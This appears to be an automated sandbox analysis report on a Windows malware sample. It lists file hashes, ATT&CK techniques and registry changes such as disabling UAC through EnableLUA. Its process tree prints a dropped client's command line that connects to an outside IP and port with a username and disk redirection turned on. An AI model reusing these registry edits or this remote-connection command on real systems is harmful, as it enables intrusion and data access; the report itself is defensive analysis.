2e96258f3dd21d059f59831295d32d324a849c87bc5a2149a49c97fcf5783558

Analysis

max time kernel
117s
max time network
144s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
31-01-2025 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-25/unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
Size

2.4MB
MD5

747fb3b7dffd1d3cef78812a1dea7970
SHA1

3bdf5b14ca2489b0bc8c3d4f66efa49a77e86b8b
SHA256

ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697
SHA512

b1a677a19563aed3b0802e7b2b674f625428e8edeefebc6fa034ef69c9afc12c4eac02cbe9bfe725e30313a0fd7e17cc16f16c6a03d6778ac533064a4b15907c
SSDEEP

49152:BVg5tQ7a3VVlS5J7VBVwzRNuPMmiCsHjg0B5:vg56aVVGbB2bCMCsHjg0

Score

10^/10

defense_evasion discovery persistence privilege_escalation trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ConnectionClient.exe

Executes dropped EXE 1 IoCs

pid	Process
2956	ConnectionClient.exe

Loads dropped DLL 4 IoCs

pid	Process
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ConnectionClient.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral29/files/0x00060000000237f3-64.dat	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

persistence privilege_escalation

Screensaver

T1546.002

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0"	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\ScreenSaveActive = "0"	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\SCRNSAVE.EXE = "0"	ConnectionClient.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ConnectionClient.exe

Modifies Control Panel 8 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\PowerOffActive = "0"	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\PowerOffTimeOut = "0"	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0"	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\ScreenSaveActive = "0"	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\SCRNSAVE.EXE = "0"	ConnectionClient.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\LowPowerActive = "0"	ConnectionClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\LowPowerTimeOut = "0"	ConnectionClient.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	ConnectionClient.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\ScreenSaveTimeOut = "1200000"	ConnectionClient.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2956	ConnectionClient.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2956	ConnectionClient.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2956	ConnectionClient.exe
2956	ConnectionClient.exe
2956	ConnectionClient.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
2956	ConnectionClient.exe
2956	ConnectionClient.exe
2956	ConnectionClient.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 2956	2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe	31
PID 2004 wrote to memory of 2956	2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe	31
PID 2004 wrote to memory of 2956	2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe	31
PID 2004 wrote to memory of 2956	2004	unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe	31

System policy modification 1 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	ConnectionClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ConnectionClient.exe

C:\Users\Admin\AppData\Local\Temp\2024-12-25\unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-25\unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Users\Admin\RDP6\ConnectionClient.exe
  "C:\Users\Admin\RDP6\ConnectionClient.exe" -server 84.22.103.190 -port 4489 -user Invernalia1 -alttab 0 -printer on -com on -smartcard off -preview on -remoteapp on -seamless off -disk on -directx on -smartsizing 0 -localtb 32
  2⤵
  - UAC bypass
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Event Triggered Execution: Screensaver
  - System Location Discovery: System Language Discovery
  - Modifies Control Panel
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - System policy modification
  PID:2956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Screensaver

T1546.002

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Event Triggered Execution

T1546

Screensaver

T1546.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\RDP6\ConnectionClient.exe

Filesize
1.4MB

MD5
a8d01e848a080fd79cebf088652dada0

SHA1
45eeb5a111ebc77923eb5f2b8ee00e724af6083d

SHA256
4dc8d4ee0dab37923ba668e0c838867b67f6f9353718bb632419f591b7f1b54b

SHA512
a777e3bb774cede097de7601b861a88c182b6b7f007941938efd3dbebf9ff7cbf88551f569c68394ffa89ae4eb759109456f84def3aaa2b0aeef87e90661600e

Download Submit
C:\Users\Admin\RDP6\bkgsc.bmp

Filesize
7KB

MD5
feb0692918248950d909d114b957d722

SHA1
6858973ee8e05a16aabae9065f10617d4147e826

SHA256
3c1fb9294d8e0c12d608d3d59a798d3b065a06c1f845fdbceafd22b31096c10a

SHA512
d9e7eb8746686b3864ec25b662e05747ed35c954650c6feb064417abfa93257eef1862235bd3d60c0f9098cdcb0f915025325b9fd1d853b32b5d23a187b851f7

Download Submit
C:\Users\Admin\RDP6\unknown-ed34607d35c3e5e97ce126000df93ecdcc854d9e7bde1ee42e08b243df314697.txt

Filesize
738B

MD5
5c149c3e1365f5385c86d419d8fb031b

SHA1
2e9325b8d2bf1e6594ff8e959c4fba2b80d817b4

SHA256
a466d35c46ad30c9341b7019a34b3d63ed34e25db6e2d4a3537a3143f71a81c0

SHA512
510cfc2f402a861b7297f44b999b6b3e8212af6e1facf2e95d112d65b8ee06bd41c7ab994cefac086146c78440bb87ae577dac56af8d16a59be02290d65c3265

Download Submit